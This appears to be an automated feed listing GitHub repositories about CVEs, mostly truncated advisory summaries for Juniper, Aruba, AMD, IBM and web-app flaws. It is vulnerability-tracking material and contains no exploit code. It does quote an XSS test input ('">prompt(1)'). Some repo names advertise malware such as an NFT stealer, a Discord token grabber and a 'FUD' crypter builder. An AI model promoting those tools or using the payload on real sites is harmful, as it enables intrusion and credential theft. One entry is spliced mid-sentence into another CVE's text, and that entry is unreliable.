**A Use After Free vulnerability in the kernel of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). In a Non Stop Routing (NSR) scenario, an unexpected kernel restart might be observed if "bgp auto-discovery" is enabled and if there is a BGP neighbor f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22402](https://github.com/Live-Hack-CVE/CVE-2023-22402) create time: 2023-01-13T01:45:32Z

**An Improper Validation of Array Index vulnerability in the Advanced Forwarding Toolkit Manager daemon (aftmand) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On the PTX10008 and PTX10016 platforms running Junos OS or Junos OS Evol CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22401](https://github.com/Live-Hack-CVE/CVE-2023-22401) create time: 2023-01-13T01:45:28Z

**An Uncontrolled Resource Consumption vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause an FPC crash leading to a Denial of Service (DoS). When a specific SNMP GET operation or a specific CLI command is executed this w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22400](https://github.com/Live-Hack-CVE/CVE-2023-22400) create time: 2023-01-13T01:45:24Z

**When sFlow is enabled and it monitors a packet forwarded via ECMP, a buffer management vulnerability in the dcpfe process of Juniper Networks Junos OS on QFX10K Series systems allows an attacker to cause the Packet Forwarding Engine (PFE) to crash and restart by sending specific genuine packets to the device, resulting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22399](https://github.com/Live-Hack-CVE/CVE-2023-22399) create time: 2023-01-13T01:45:19Z

**An Allocation of Resources Without Limits or Throttling weakness in the memory management of the Packet Forwarding Engine (PFE) on Juniper Networks Junos OS Evolved PTX10003 Series devices allows an adjacently located attacker who has established certain preconditions and knowledge of the environment to send certain sp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22397](https://github.com/Live-Hack-CVE/CVE-2023-22397) create time: 2023-01-13T01:45:15Z

**A Missing Release of Memory after Effective Lifetime vulnerability in the kernel of Juniper Networks Junos OS allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). In an MPLS scenario specific packets destined to an Integrated Routing and Bridging (irb) interface of the device will cause a bu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22395](https://github.com/Live-Hack-CVE/CVE-2023-22395) create time: 2023-01-13T01:45:10Z

**Nexpose and InsightVM virtual appliances downloaded between April 5th, 2017 and May 3rd, 2017 contain identical SSH host keys. Normally, a unique SSH host key should be generated the first time a virtual appliance boots. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-5242](https://github.com/Live-Hack-CVE/CVE-2017-5242) create time: 2023-01-12T23:33:06Z

**Transient DOS due to null pointer dereference in Bluetooth HOST while receiving an attribute protocol PDU with zero length data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33299](https://github.com/Live-Hack-CVE/CVE-2022-33299) create time: 2023-01-12T23:34:05Z

**Transient DOS in Bluetooth HOST due to null pointer dereference when a mismatched argument is passed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33290](https://github.com/Live-Hack-CVE/CVE-2022-33290) create time: 2023-01-12T23:33:53Z

**Transient DOS due to buffer over-read in WLAN while processing 802.11 management frames. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33286](https://github.com/Live-Hack-CVE/CVE-2022-33286) create time: 2023-01-12T23:33:47Z

**A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47102](https://github.com/Live-Hack-CVE/CVE-2022-47102) create time: 2023-01-12T23:33:28Z

**Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46623](https://github.com/Live-Hack-CVE/CVE-2022-46623) create time: 2023-01-12T23:33:24Z

**A cross-site scripting (XSS) vulnerability in Judging Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46622](https://github.com/Live-Hack-CVE/CVE-2022-46622) create time: 2023-01-12T23:33:19Z

**A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45729](https://github.com/Live-Hack-CVE/CVE-2022-45729) create time: 2023-01-12T23:33:15Z

**Doctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45728](https://github.com/Live-Hack-CVE/CVE-2022-45728) create time: 2023-01-12T23:33:11Z

**Information disclosure due to buffer over-read in WLAN while WLAN frame parsing due to missing frame length check. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33283](https://github.com/Live-Hack-CVE/CVE-2022-33283) create time: 2023-01-12T23:32:57Z

**Information disclosure due to buffer over-read in WLAN while parsing BTM action frame. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33284](https://github.com/Live-Hack-CVE/CVE-2022-33284) create time: 2023-01-12T23:32:53Z

**Mercurius is a GraphQL adapter for Fastify. Any users of Mercurius until version 10.5.0 are subjected to a denial of service attack by sending a malformed packet over WebSocket to `/graphql`. This issue was patched in #940. As a workaround, users can disable subscriptions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22477](https://github.com/Live-Hack-CVE/CVE-2023-22477) create time: 2023-01-12T23:33:58Z

**A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Category List Handler. The manipulation of the argument Reason with the input ">prompt(1) leads to cross site scripting. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0258](https://github.com/Live-Hack-CVE/CVE-2023-0258) create time: 2023-01-12T23:33:42Z

**A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /fos/admin/index.php?page=menu of the component Menu Form. The manipulation of the argument Image with the input "#p` syntax. The following behavior never changes no matter if the actor should be able to read the mentioned post or no CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22487](https://github.com/Live-Hack-CVE/CVE-2023-22487) create time: 2023-01-11T22:12:23Z

**no description** : [emotest1/cve_2023_0110](https://github.com/emotest1/cve_2023_0110) create time: 2023-01-11T21:35:02Z

**A vulnerability in the HTTP/HTTPS service used by J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP) allows an unauthenticated attacker to perform local file inclusion (LFI) or path traversal. Using this vulnerability, an attacker may CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1631](https://github.com/Live-Hack-CVE/CVE-2020-1631) create time: 2023-01-11T20:00:23Z

**A vulnerability, which was classified as critical, was found in IonicaBizau node-gry up to 5.x. This affects an unknown part. The manipulation leads to command injection. Upgrading to version 6.0.0 is able to address this issue. The name of the patch is 5108446c1e23960d65e8b973f1d9486f9f9dbd6c. It is recommended to upg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36650](https://github.com/Live-Hack-CVE/CVE-2020-36650) create time: 2023-01-11T19:59:54Z

**Due to a misconfiguration in the manifest file of the WARP client for Android, it was possible to a perform a task hijacking attack. An attacker could create a malicious mobile application which could hijack legitimate app and steal potentially sensitive information when installed on the victim's device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4457](https://github.com/Live-Hack-CVE/CVE-2022-4457) create time: 2023-01-11T20:00:40Z

**support_uri parameter in the WARP client local settings file (mdm.xml) lacked proper validation which allowed for privilege escalation and launching an arbitrary executable on the local machine upon clicking on the "Send feedback" option. An attacker with access to the local file system could use a crafted XML config f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4428](https://github.com/Live-Hack-CVE/CVE-2022-4428) create time: 2023-01-11T20:00:36Z

**IBM Sterling Partner Engagement Manager 6.1, 6.2, and 6.2.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 236208. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40615](https://github.com/Live-Hack-CVE/CVE-2022-40615) create time: 2023-01-11T20:00:32Z

**IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.1 could allow an authenticated user to exhaust server resources which could lead to a denial of service. IBM X-Force ID: 229705. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34335](https://github.com/Live-Hack-CVE/CVE-2022-34335) create time: 2023-01-11T20:00:27Z

**A vulnerability in the Aruba EdgeConnect Enterprise Orchestrator web-based management interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete sy CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44534](https://github.com/Live-Hack-CVE/CVE-2022-44534) create time: 2023-01-11T20:00:14Z

**A vulnerability in the Aruba EdgeConnect Enterprise Orchestrator web-based management interface allows remote low-privileged authenticated users to escalate their privileges to those of an administrative user. A successful exploit could allow an attacker to achieve administrative privilege on the web-management interfa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44535](https://github.com/Live-Hack-CVE/CVE-2022-44535) create time: 2023-01-11T20:00:09Z

**A vulnerability has been found in sviehb jefferson up to 0.3 and classified as critical. This vulnerability affects unknown code of the file src/scripts/jefferson. The manipulation leads to path traversal. The attack can be initiated remotely. Upgrading to version 0.4 is able to address this issue. The name of the patc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4885](https://github.com/Live-Hack-CVE/CVE-2022-4885) create time: 2023-01-11T19:59:59Z

**GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Null pointer dereference via filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47094](https://github.com/Live-Hack-CVE/CVE-2022-47094) create time: 2023-01-11T19:59:46Z

**GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47095](https://github.com/Live-Hack-CVE/CVE-2022-47095) create time: 2023-01-11T19:59:42Z

**Finding CVE-2022-3786 (openssl) with Mayhem** : [WhatTheFuzz/openssl-fuzz](https://github.com/WhatTheFuzz/openssl-fuzz) create time: 2023-01-11T19:52:43Z

**poc of CVE-2022-46689 written purely in swift** : [staturnzz/sw1tch](https://github.com/staturnzz/sw1tch) create time: 2023-01-05T20:47:12Z

**A vulnerability classified as problematic has been found in zerochplus. This affects the function PrintResList of the file test/mordor/thread.res.pl. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 9ddf9ecca8565341d8d26a3b2f64540bde4fa273. It is r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10010](https://github.com/Live-Hack-CVE/CVE-2013-10010) create time: 2023-01-11T17:48:22Z

**loop_rw_iter in fs/io_uring.c in the Linux kernel 5.10 through 5.14.6 allows local users to gain privileges by using IORING_OP_PROVIDE_BUFFERS to trigger a free of a kernel buffer, as demonstrated by using /proc//maps for exploitation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41073](https://github.com/Live-Hack-CVE/CVE-2021-41073) create time: 2023-01-11T17:47:54Z

**Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43523](https://github.com/Live-Hack-CVE/CVE-2022-43523) create time: 2023-01-11T17:49:08Z

**Multiple vulnerabilities within the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43527](https://github.com/Live-Hack-CVE/CVE-2022-43527) create time: 2023-01-11T17:49:04Z

**A vulnerability in the ClearPass OnGuard Linux agent could allow malicious users on a Linux instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with root level privileges on the Linux instance in Aruba ClearPass Policy Manager version(s): ClearPass Policy Ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43534](https://github.com/Live-Hack-CVE/CVE-2022-43534) create time: 2023-01-11T17:49:00Z

**Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43520](https://github.com/Live-Hack-CVE/CVE-2022-43520) create time: 2023-01-11T17:48:55Z

**Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43521](https://github.com/Live-Hack-CVE/CVE-2022-43521) create time: 2023-01-11T17:48:46Z

**Under certain configurations, an attacker can login to Aruba EdgeConnect Enterprise Orchestrator without supplying a multi-factor authentication code. Successful exploitation allows an attacker to login using only a username and password and successfully bypass MFA requirements in Aruba EdgeConnect Enterprise Orchestra CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43528](https://github.com/Live-Hack-CVE/CVE-2022-43528) create time: 2023-01-11T17:48:36Z

**A vulnerability in the ClearPass OnGuard Windows agent could allow malicious users on a Windows instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with NT AUTHORITY\SYSTEM level privileges on the Windows instance in Aruba ClearPass Policy Manager version(s) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43535](https://github.com/Live-Hack-CVE/CVE-2022-43535) create time: 2023-01-11T17:48:31Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploits could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43536](https://github.com/Live-Hack-CVE/CVE-2022-43536) create time: 2023-01-11T17:48:27Z

**efs-utils is a set of Utilities for Amazon Elastic File System (EFS). A potential race condition issue exists within the Amazon EFS mount helper in efs-utils versions v1.34.3 and below. When using TLS to mount file systems, the mount helper allocates a local port for stunnel to receive NFS connections prior to applying CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46174](https://github.com/Live-Hack-CVE/CVE-2022-46174) create time: 2023-01-11T17:48:18Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploits could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43537](https://github.com/Live-Hack-CVE/CVE-2022-43537) create time: 2023-01-11T17:48:12Z

**A vulnerability exists in the ClearPass Policy Manager cluster communications that allow for an attacker in a privileged network position to potentially obtain sensitive information. A successful exploit could allow an attacker to retrieve information that allows for unauthorized actions as a privileged user on the Cle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43539](https://github.com/Live-Hack-CVE/CVE-2022-43539) create time: 2023-01-11T17:48:08Z

**A vulnerability exists in the ClearPass OnGuard macOS agent that allows for an attacker with local macOS instance access to potentially obtain sensitive information. A successful exploit could allow an attacker to retrieve information that is of a sensitive nature in Aruba ClearPass Policy Manager version(s): ClearPass CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43540](https://github.com/Live-Hack-CVE/CVE-2022-43540) create time: 2023-01-11T17:48:03Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploits could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43538](https://github.com/Live-Hack-CVE/CVE-2022-43538) create time: 2023-01-11T17:47:59Z

**no description** : [PoyomiFox/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/PoyomiFox/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2023-01-11T17:35:47Z

**no description** : [PoyomiFox/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/PoyomiFox/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-01-11T17:25:42Z

**no description** : [PoyomiFox/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/PoyomiFox/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-01-11T17:24:51Z

**WordPress through 6.1.1 depends on unpredictable client visits to cause wp-cron.php execution and the resulting security updates, and the source code describes "the scenario where a site may not receive enough visits to execute scheduled tasks in a timely manner," but neither the installation guide nor the security gui CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22622](https://github.com/Live-Hack-CVE/CVE-2023-22622) create time: 2023-01-11T17:49:13Z

**Improper Restriction of Rendered UI Layers or Frames in GitHub repository pyload/pyload prior to 0.5.0b3.dev33. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0057](https://github.com/Live-Hack-CVE/CVE-2023-0057) create time: 2023-01-11T17:48:51Z

**ViewVC is a browser interface for CVS and Subversion version control repositories. Versions prior to 1.2.3 and 1.1.30 are vulnerable to cross-site scripting. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a Subversion repository exposed by an otherwise trusted Vie CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22464](https://github.com/Live-Hack-CVE/CVE-2023-22464) create time: 2023-01-11T17:48:40Z

**A vulnerability has been found in Newcomer1989 TSN-Ranksystem up to 1.2.6 and classified as problematic. This vulnerability affects the function getlog of the file webinterface/bot.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.2.7 is able to address th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25073](https://github.com/Live-Hack-CVE/CVE-2018-25073) create time: 2023-01-11T15:37:12Z

**There exists a use-after-free vulnerability in the Linux kernel through io_uring and the IORING_OP_SPLICE operation. If IORING_OP_SPLICE is missing the IO_WQ_WORK_FILES flag, which signals that the operation won't use current->nsproxy, so its reference counter is not increased. This assumption is not always true as cal CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4696](https://github.com/Live-Hack-CVE/CVE-2022-4696) create time: 2023-01-11T15:37:32Z

**Caret is vulnerable to an XSS attack when the user opens a crafted Markdown file when preview mode is enabled. This directly leads to client-side code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42967](https://github.com/Live-Hack-CVE/CVE-2022-42967) create time: 2023-01-11T15:37:27Z

**Lead management system v1.0 is vulnerable to SQL Injection via the id parameter in removeBrand.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47866](https://github.com/Live-Hack-CVE/CVE-2022-47866) create time: 2023-01-11T15:37:22Z

**Lead Management System v1.0 is vulnerable to SQL Injection via the id parameter in removeOrder.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47865](https://github.com/Live-Hack-CVE/CVE-2022-47865) create time: 2023-01-11T15:37:17Z

**Vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct SQL injection attacks against the ClearPass Policy Manager instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43530](https://github.com/Live-Hack-CVE/CVE-2022-43530) create time: 2023-01-11T15:37:06Z

**no description** : [Ki11i0n4ir3/CVE-2021-43798](https://github.com/Ki11i0n4ir3/CVE-2021-43798) create time: 2023-01-09T05:53:30Z

**Reproduction for CVE-2022-46175** : [giz-berlin/quasar-app-webpack-json5-vulnerability](https://github.com/giz-berlin/quasar-app-webpack-json5-vulnerability) create time: 2023-01-11T12:48:17Z

**no description** : [despossivel/CVE-2022-23529-lab](https://github.com/despossivel/CVE-2022-23529-lab) create time: 2023-01-11T11:46:22Z

**Insufficient checks in SEV may lead to a malicious hypervisor disclosing the launch secret potentially resulting in compromise of VM confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26403](https://github.com/Live-Hack-CVE/CVE-2021-26403) create time: 2023-01-11T11:13:38Z

**Insufficient bounds checking in ASP (AMD Secure Processor) firmware while handling BIOS mailbox commands, may allow an attacker to write partially-controlled data out-of-bounds to SMM or SEV-ES regions which may lead to a potential loss of integrity and availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26402](https://github.com/Live-Hack-CVE/CVE-2021-26402) create time: 2023-01-11T11:13:34Z

**Insufficient validation of address mapping to IO in ASP (AMD Secure Processor) may result in a loss of memory integrity in the SNP guest. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26396](https://github.com/Live-Hack-CVE/CVE-2021-26396) create time: 2023-01-11T11:13:29Z

**Insufficient input validation in SYS_KEY_DERIVE system call in a compromised user application or ABL may allow an attacker to corrupt ASP (AMD Secure Processor) OS memory which may lead to potential arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26398](https://github.com/Live-Hack-CVE/CVE-2021-26398) create time: 2023-01-11T11:13:26Z

**Insufficient fencing and checks in System Management Unit (SMU) may result in access to invalid message port registers that could result in a potential denial-of-service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26355](https://github.com/Live-Hack-CVE/CVE-2021-26355) create time: 2023-01-11T11:13:21Z

**Failure to verify the mode of CPU execution at the time of SNP_INIT may lead to a potential loss of memory integrity for SNP guests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26328](https://github.com/Live-Hack-CVE/CVE-2021-26328) create time: 2023-01-11T11:13:17Z

**Failure to validate the integer operand in ASP (AMD Secure Processor) bootloader may allow an attacker to introduce an integer overflow in the L2 directory table in SPI flash resulting in a potential denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26346](https://github.com/Live-Hack-CVE/CVE-2021-26346) create time: 2023-01-11T11:13:13Z

**Insufficient validation in ASP BIOS and DRTM commands may allow malicious supervisor x86 software to disclose the contents of sensitive memory which may result in information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26343](https://github.com/Live-Hack-CVE/CVE-2021-26343) create time: 2023-01-11T11:13:08Z

**Failure to validate the communication buffer and communication service in the BIOS may allow an attacker to tamper with the buffer resulting in potential SMM (System Management Mode) arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26316](https://github.com/Live-Hack-CVE/CVE-2021-26316) create time: 2023-01-11T11:13:03Z

**Insufficient input validation in the ASP may allow an attacker with physical access, unauthorized write access to memory potentially leading to a loss of integrity or denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46767](https://github.com/Live-Hack-CVE/CVE-2021-46767) create time: 2023-01-11T11:12:04Z

**Failure to validate addresses provided by software to BIOS commands may result in a potential loss of integrity of guest memory in a confidential compute environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23814](https://github.com/Live-Hack-CVE/CVE-2022-23814) create time: 2023-01-11T11:12:14Z

**The software interfaces to ASP and SMU may not enforce the SNP memory security policy resulting in a potential loss of integrity of guest memory in a confidential compute environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23813](https://github.com/Live-Hack-CVE/CVE-2022-23813) create time: 2023-01-11T11:12:09Z

**Dell EMC SCG Policy Manager, versions from 5.10 to 5.12, contain(s) a contain a Hard-coded Cryptographic Key vulnerability. An attacker with the knowledge of the hard-coded sensitive information, could potentially exploit this vulnerability to login to the system to gain admin privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34440](https://github.com/Live-Hack-CVE/CVE-2022-34440) create time: 2023-01-11T11:11:56Z

**Dell EMC SCG Policy Manager, versions from 5.10 to 5.12, contain(s) a contain a Hard-coded Cryptographic Key vulnerability. An attacker with the knowledge of the hard-coded sensitive information, could potentially exploit this vulnerability to login to the system to gain admin privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34441](https://github.com/Live-Hack-CVE/CVE-2022-34441) create time: 2023-01-11T11:11:51Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22885](https://github.com/Live-Hack-CVE/CVE-2023-22885) create time: 2023-01-11T11:12:59Z

**Insufficient input validation in the SMU may allow an attacker to improperly lock resources, potentially resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20532](https://github.com/Live-Hack-CVE/CVE-2023-20532) create time: 2023-01-11T11:12:54Z

**Insufficient bound checks in the SMU may allow an attacker to update the SRAM from/to address space to an invalid value potentially resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20531](https://github.com/Live-Hack-CVE/CVE-2023-20531) create time: 2023-01-11T11:12:49Z

**Insufficient input validation of BIOS mailbox messages in SMU may result in out-of-bounds memory reads potentially resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20530](https://github.com/Live-Hack-CVE/CVE-2023-20530) create time: 2023-01-11T11:12:46Z

**Insufficient bound checks in the SMU may allow an attacker to update the from/to address space to an invalid value potentially resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20529](https://github.com/Live-Hack-CVE/CVE-2023-20529) create time: 2023-01-11T11:12:42Z

**Insufficient input validation in the SMU may allow a physical attacker to exfiltrate SMU memory contents over the I2C bus potentially leading to a loss of confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20528](https://github.com/Live-Hack-CVE/CVE-2023-20528) create time: 2023-01-11T11:12:37Z

**Improper syscall input validation in the ASP Bootloader may allow a privileged attacker to read memory out-of-bounds, potentially leading to a denial-of-service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20527](https://github.com/Live-Hack-CVE/CVE-2023-20527) create time: 2023-01-11T11:12:33Z

**Insufficient syscall input validation in the ASP Bootloader may allow a privileged attacker to read memory outside the bounds of a mapped register potentially leading to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20525](https://github.com/Live-Hack-CVE/CVE-2023-20525) create time: 2023-01-11T11:12:28Z

**TOCTOU in the ASP may allow a physical attacker to write beyond the buffer bounds, potentially leading to a loss of integrity or denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20523](https://github.com/Live-Hack-CVE/CVE-2023-20523) create time: 2023-01-11T11:12:23Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0161](https://github.com/Live-Hack-CVE/CVE-2023-0161) create time: 2023-01-11T11:12:18Z

**In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22952](https://github.com/Live-Hack-CVE/CVE-2023-22952) create time: 2023-01-11T11:12:00Z

**Fork of the send module to deal with CVE-2017-20165** : [fastify/send](https://github.com/fastify/send) create time: 2023-01-11T10:20:27Z

**no description** : [WodenSec/CVE-2022-46484](https://github.com/WodenSec/CVE-2022-46484) create time: 2022-11-26T11:49:09Z

**no description** : [WodenSec/CVE-2022-46485](https://github.com/WodenSec/CVE-2022-46485) create time: 2022-11-16T16:26:34Z

**usb device bluetooth class includes a buffer overflow related to implementation of net_buf_add_mem. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3966](https://github.com/Live-Hack-CVE/CVE-2021-3966) create time: 2023-01-11T06:51:53Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 22 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34330](https://github.com/Live-Hack-CVE/CVE-2022-34330) create time: 2023-01-11T06:52:53Z

**A buffer overflow vulnerability in the parameter of web server in Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an authenticated attacker to cause denial-of-service (DoS) conditions by sending a crafted authorization request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43392](https://github.com/Live-Hack-CVE/CVE-2022-43392) create time: 2023-01-11T06:52:38Z

